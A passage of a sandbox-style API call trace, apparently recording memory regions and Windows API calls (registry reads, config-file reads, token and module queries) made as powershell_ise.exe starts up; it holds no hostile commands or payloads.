= 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2945 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2946 start_va = 0x5960000 end_va = 0x596ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 2947 start_va = 0x5970000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 2948 start_va = 0x5970000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 2949 start_va = 0x5970000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 2950 start_va = 0x5970000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 2951 start_va = 0x5960000 end_va = 0x596ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 2952 start_va = 0x5960000 end_va = 0x5b6afff monitored = 0 entry_point = 0x5a0b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2953 start_va = 0x72d30000 end_va = 0x72f3efff monitored = 0 entry_point = 0x72ddb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2954 start_va = 0x47b0000 end_va = 0x47b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2955 start_va = 0x5300000 end_va = 0x5301fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005300000" filename = "" Region: id = 2956 start_va = 0x56c0000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 2957 start_va = 0x5700000 end_va = 0x573ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 2958 start_va = 0x5740000 end_va = 0x577ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 2959 start_va = 0x5960000 end_va = 0x5a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 2962 start_va = 0x5010000 end_va = 0x504ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 2963 start_va = 0x5050000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 2964 start_va = 0x56c0000 end_va = 0x57bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 2969 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2970 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2971 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2972 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2973 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2974 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2975 start_va = 0x4e10000 end_va = 0x4e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 2976 start_va = 0x4e20000 end_va = 0x4e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 2977 start_va = 0x4e30000 end_va = 0x4e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 2978 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2979 start_va = 0x47b0000 end_va = 0x47b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 2980 start_va = 0x4e10000 end_va = 0x4e1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 2981 start_va = 0x4e20000 end_va = 0x4e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 3008 start_va = 0x4e20000 end_va = 0x4e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 3009 start_va = 0x4e60000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 3029 start_va = 0x4e20000 end_va = 0x4e29fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 3048 start_va = 0x700000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3049 start_va = 0x4ea0000 end_va = 0x4edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 3050 start_va = 0x4fd0000 end_va = 0x50cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Thread: id = 59 os_tid = 0x1184 [0147.850] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0147.867] RoInitialize () returned 0x1 [0147.868] RoUninitialize () returned 0x0 [0148.265] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x230 [0148.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x234 [0148.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e604 | out: phkResult=0x19e604*=0x244) returned 0x0 [0148.292] RegQueryValueExW (in: hKey=0x244, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e624, lpData=0x0, lpcbData=0x19e620*=0x0 | out: lpType=0x19e624*=0x1, lpData=0x0, lpcbData=0x19e620*=0xe) returned 0x0 [0148.292] RegQueryValueExW (in: hKey=0x244, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e624, lpData=0x2254620, lpcbData=0x19e620*=0xe | out: lpType=0x19e624*=0x1, lpData="Client", lpcbData=0x19e620*=0xe) returned 0x0 [0148.294] RegCloseKey (hKey=0x244) returned 0x0 [0148.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0148.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19cec0 | out: phkResult=0x19cec0*=0x0) returned 0x2 [0148.569] GetCurrentProcess () returned 0xffffffff [0148.569] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e300 | out: TokenHandle=0x19e300*=0x244) returned 1 [0148.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19dd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0148.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2f8 | out: lpFileInformation=0x19e2f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0148.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19dd64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0148.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e300 | out: lpFileInformation=0x19e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0148.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0148.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e238) returned 1 [0148.582] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x248 [0148.583] GetFileType (hFile=0x248) returned 0x1 [0148.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e234) returned 1 [0148.583] GetFileType (hFile=0x248) returned 0x1 [0148.595] GetFileSize (in: hFile=0x248, lpFileSizeHigh=0x19e2f4 | out: lpFileSizeHigh=0x19e2f4*=0x0) returned 0x8c8f [0148.596] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e2b0, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e2b0*=0x1000, lpOverlapped=0x0) returned 1 [0148.611] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e160, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e160*=0x1000, lpOverlapped=0x0) returned 1 [0148.612] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e014, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e014*=0x1000, lpOverlapped=0x0) returned 1 [0148.614] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e014, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e014*=0x1000, lpOverlapped=0x0) returned 1 [0148.614] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e014, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e014*=0x1000, lpOverlapped=0x0) returned 1 [0148.614] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df4c, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19df4c*=0x1000, lpOverlapped=0x0) returned 1 [0148.618] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e0cc*=0x1000, lpOverlapped=0x0) returned 1 [0148.621] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfdc, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19dfdc*=0x1000, lpOverlapped=0x0) returned 1 [0148.621] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfdc, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19dfdc*=0xc8f, lpOverlapped=0x0) returned 1 [0148.621] ReadFile (in: hFile=0x248, lpBuffer=0x2258968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e09c, lpOverlapped=0x0 | out: lpBuffer=0x2258968*, lpNumberOfBytesRead=0x19e09c*=0x0, lpOverlapped=0x0) returned 1 [0148.621] CloseHandle (hObject=0x248) returned 1 [0148.622] GetCurrentProcess () returned 0xffffffff [0148.622] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e444 | out: TokenHandle=0x19e444*=0x248) returned 1 [0148.623] GetCurrentProcess () returned 0xffffffff [0148.623] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e444 | out: TokenHandle=0x19e444*=0x24c) returned 1 [0148.623] GetCurrentProcess () returned 0xffffffff [0148.623] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e300 | out: TokenHandle=0x19e300*=0x250) returned 1 [0148.624] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2f8 | out: lpFileInformation=0x19e2f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc)) returned 1 [0148.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19dd64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0148.624] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e300 | out: lpFileInformation=0x19e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc)) returned 1 [0148.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0148.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e238) returned 1 [0148.624] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0148.624] GetFileType (hFile=0x254) returned 0x1 [0148.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e234) returned 1 [0148.624] GetFileType (hFile=0x254) returned 0x1 [0148.624] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x19e2f4 | out: lpFileSizeHigh=0x19e2f4*=0x0) returned 0xcc [0148.624] ReadFile (in: hFile=0x254, lpBuffer=0x2270dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e2b0, lpOverlapped=0x0 | out: lpBuffer=0x2270dd4*, lpNumberOfBytesRead=0x19e2b0*=0xcc, lpOverlapped=0x0) returned 1 [0148.625] ReadFile (in: hFile=0x254, lpBuffer=0x2270dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e188, lpOverlapped=0x0 | out: lpBuffer=0x2270dd4*, lpNumberOfBytesRead=0x19e188*=0x0, lpOverlapped=0x0) returned 1 [0148.625] CloseHandle (hObject=0x254) returned 1 [0148.626] GetCurrentProcess () returned 0xffffffff [0148.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e444 | out: TokenHandle=0x19e444*=0x254) returned 1 [0148.626] GetCurrentProcess () returned 0xffffffff [0148.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e444 | out: TokenHandle=0x19e444*=0x258) returned 1 [0148.653] GetCurrentProcess () returned 0xffffffff [0148.653] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e2a4 | out: TokenHandle=0x19e2a4*=0x25c) returned 1 [0148.676] GetCurrentProcess () returned 0xffffffff [0148.676] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e2b4 | out: TokenHandle=0x19e2b4*=0x260) returned 1 [0148.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3e8 | out: phkResult=0x19f3e8*=0x264) returned 0x0 [0148.704] RegQueryValueExW (in: hKey=0x264, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f404, lpData=0x0, lpcbData=0x19f400*=0x0 | out: lpType=0x19f404*=0x4, lpData=0x0, lpcbData=0x19f400*=0x4) returned 0x0 [0148.704] RegQueryValueExW (in: hKey=0x264, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f404, lpData=0x19f3f0, lpcbData=0x19f400*=0x4 | out: lpType=0x19f404*=0x4, lpData=0x19f3f0*=0x1, lpcbData=0x19f400*=0x4) returned 0x0 [0148.705] RegQueryValueExW (in: hKey=0x264, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f43c, lpData=0x0, lpcbData=0x19f438*=0x0 | out: lpType=0x19f43c*=0x4, lpData=0x0, lpcbData=0x19f438*=0x4) returned 0x0 [0148.706] RegCloseKey (hKey=0x264) returned 0x0 [0148.710] GetCurrentProcessId () returned 0x1188 [0148.716] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ec84 | out: lpLuid=0x19ec84*(LowPart=0x14, HighPart=0)) returned 1 [0148.734] GetCurrentProcess () returned 0xffffffff [0148.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19ec80 | out: TokenHandle=0x19ec80*=0x26c) returned 1 [0148.735] AdjustTokenPrivileges (in: TokenHandle=0x26c, DisableAllPrivileges=0, NewState=0x2277824*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0148.735] CloseHandle (hObject=0x26c) returned 1 [0148.737] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1188) returned 0x26c [0148.748] EnumProcessModules (in: hProcess=0x26c, lphModule=0x2277868, cb=0x100, lpcbNeeded=0x19f3f0 | out: lphModule=0x2277868, lpcbNeeded=0x19f3f0) returned 1 [0148.750] GetModuleInformation (in: hProcess=0x26c, hModule=0x400000, lpmodinfo=0x22779a8, cb=0xc | out: lpmodinfo=0x22779a8*(lpBaseOfDll=0x400000, SizeOfImage=0x3a000, EntryPoint=0x0)) returned 1 [0148.751] CoTaskMemAlloc (cb=0x804) returned 0x545d60 [0148.752] GetModuleBaseNameW (in: hProcess=0x26c, hModule=0x400000, lpBaseName=0x545d60, nSize=0x800 | out: lpBaseName="powershell_ise.exe") returned 0x12 [0148.752] CoTaskMemFree (pv=0x545d60) [0148.753] CoTaskMemAlloc (cb=0x804) returned 0x545d60 [0148.753] GetModuleFileNameExW (in: hProcess=0x26c, hModule=0x400000, lpFilename=0x545d60, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe")) returned 0x3d [0148.753] CoTaskMemFree (pv=0x545d60) [0148.754] CloseHandle (hObject=0x26c) returned 1 [0148.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", nBufferLength=0x105, lpBuffer=0x19eef8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", lpFilePart=0x0) returned 0x3d [0148.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SecurityProtocol", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3e8 | out: phkResult=0x19f3e8*=0x0) returned 0x2 [0148.789] EtwEventRegister () returned 0x0 [0148.793] EtwEventSetInformation () returned 0x0 [0148.809] GetCurrentProcessId () returned 0x1188 [0148.809] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1188) returned 0x270 [0148.809] EnumProcessModules (in: hProcess=0x270, lphModule=0x227d7b0, cb=0x100, lpcbNeeded=0x19f3f8 | out: lphModule=0x227d7b0, lpcbNeeded=0x19f3f8) returned 1 [0148.810] GetModuleInformation (in: hProcess=0x270, hModule=0x400000, lpmodinfo=0x227d8f0, cb=0xc | out: lpmodinfo=0x227d8f0*(lpBaseOfDll=0x400000, SizeOfImage=0x3a000, EntryPoint=0x0)) returned 1 [0148.810] CoTaskMemAlloc (cb=0x804) returned 0x545d60 [0148.810] GetModuleBaseNameW (in: hProcess=0x270, hModule=0x400000, lpBaseName=0x545d60, nSize=0x800 | out: lpBaseName="powershell_ise.exe") returned 0x12 [0148.810] CoTaskMemFree (pv=0x545d60) [0148.810] CoTaskMemAlloc (cb=0x804) returned 0x545d60 [0148.810] GetModuleFileNameExW (in: hProcess=0x270, hModule=0x400000, lpFilename=0x545d60, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe")) returned 0x3d [0148.810] CoTaskMemFree (pv=0x545d60) [0148.810] CloseHandle (hObject=0x270) returned 1 [0148.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", nBufferLength=0x105, lpBuffer=0x19ef00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", lpFilePart=0x0) returned 0x3d [0148.811] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3f0 | out: phkResult=0x19f3f0*=0x0) returned 0x2 [0148.811] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3f0 | out: phkResult=0x19f3f0*=0x270) returned 0x0 [0148.811] RegQueryValueExW (in: hKey=0x270, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x19f40c, lpData=0x0, lpcbData=0x19f408*=0x0 | out: lpType=0x19f40c*=0x0, lpData=0x0, lpcbData=0x19f408*=0x0) returned 0x2 [0148.811] RegCloseKey (hKey=0x270) returned 0x0 [0148.891] GetCurrentProcessId () returned 0x1188 [0148.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32594d0, Length=0x20000, ResultLength=0x19f454 | out: SystemInformation=0x32594d0, ResultLength=0x19f454*=0x15920) returned 0x0 [0148.933] GetCurrentProcessId () returned 0x1188 [0148.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32594d0, Length=0x20000, ResultLength=0x19f444 | out: SystemInformation=0x32594d0, ResultLength=0x19f444*=0x15920) returned 0x0 [0149.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x19edd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0149.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x19ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0149.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f2e4) returned 1 [0149.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f360 | out: lpFileInformation=0x19f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0149.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f2e0) returned 1 [0149.223] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19f23c | out: pfEnabled=0x19f23c) returned 0x0 [0149.363] CreateBindCtx (in: reserved=0x0, ppbc=0x19f420 | out: ppbc=0x19f420*=0x534da8) returned 0x0 [0149.364] IUnknown:QueryInterface (in: This=0x534da8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eed4 | out: ppvObject=0x19eed4*=0x534da8) returned 0x0 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, 